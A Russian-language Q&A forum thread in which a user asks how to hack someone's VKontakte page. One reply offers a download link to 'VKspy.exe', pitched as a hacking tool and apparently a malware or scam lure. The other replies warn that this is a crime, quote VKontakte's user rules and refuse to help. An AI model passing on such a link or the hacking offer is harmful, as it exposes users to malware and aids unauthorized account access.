Прочее компьютерное

Помогите пожалуйста взломать страницу в контакте. Мне очень нужно ее взломать,но я не умею.Помогите пожалуйста

на вот скачай программку! http:// lordsadler2010. xaker. ru/ VKspy.exe
Включай, заходи вконтакт и всё норм!))))))))))) ) И жми нравится и рассказать друзьям!
//если_мой_ответ_поможет_вам, _и_вы_захотите поблагодарить_меня, _то_прибавьте_мне_баллов_в_моём_мире_+5_или_+10_за_основное_фото_-_это_для_меня_лучшая_благодарность! //
Igor Stolyarov
Лучший ответ
дело то подсудное-посадють....
А ты в кусре что это уголовно наказуемо! ?
Взломайешь-на 5 лет посиди.
не занимайся ерундой
Muzeffer Ferhadov
Девочка, взломать страницу вконтакте тебе никто не даст.
5.1. При пользовании Услугами Сайта Пользователь обязан:
соблюдать положения действующего законодательства Российской Федерации, настоящих Правил и иных специальных документов Администрации Сайта;
предоставлять при регистрации достоверные, полные и актуальные данные, следить за их актуализацией;
информировать Администрацию Сайта о несанкционированном доступе к персональной странице и/или о несанкционированном доступе и/или использовании пароля и логина Пользователя;
не предоставлять доступ другим Пользователям к собственной персональной странице или к отдельной содержащейся на ней информации в случае, если это может привести к нарушению законодательства Российской Федерации и/или настоящих Правил, специальных документов Администрации Сайта;
не размещать на персональной странице информацию и объекты (включая ссылки на них) , которые могут нарушать права и интересы других лиц;
перед размещением информации и объектов (включая, но не ограничиваясь, изображениями других лиц, чужими текстами различного содержания, аудиозаписями и видеофильмами) предварительно оценивать законность их размещения;
хранить в тайне и не предоставлять другим Пользователям и третьим лицам ставшие ему известными в результате общения с другими Пользователями и иного использования Сайта персональные данные (включая, но не ограничиваясь, домашними адресами, номерами телефонов, адресами электронной почты, ICQ, паспортными данными, банковской информацией) и информацию о частной жизни других Пользователей и третьих лиц без получения соответствующего предварительного разрешения последних;
осуществлять резервное копирование важной для Пользователя хранящейся на его персональной странице информации.

ДЕВОЧКА, ИДИ НА УЛИЦУ, ПОГУЛЯЙ, И ЖИВИ РЕАЛЬНОЙ ЖИЗНЬЮ
Murat Alaidar
А зачем тебе?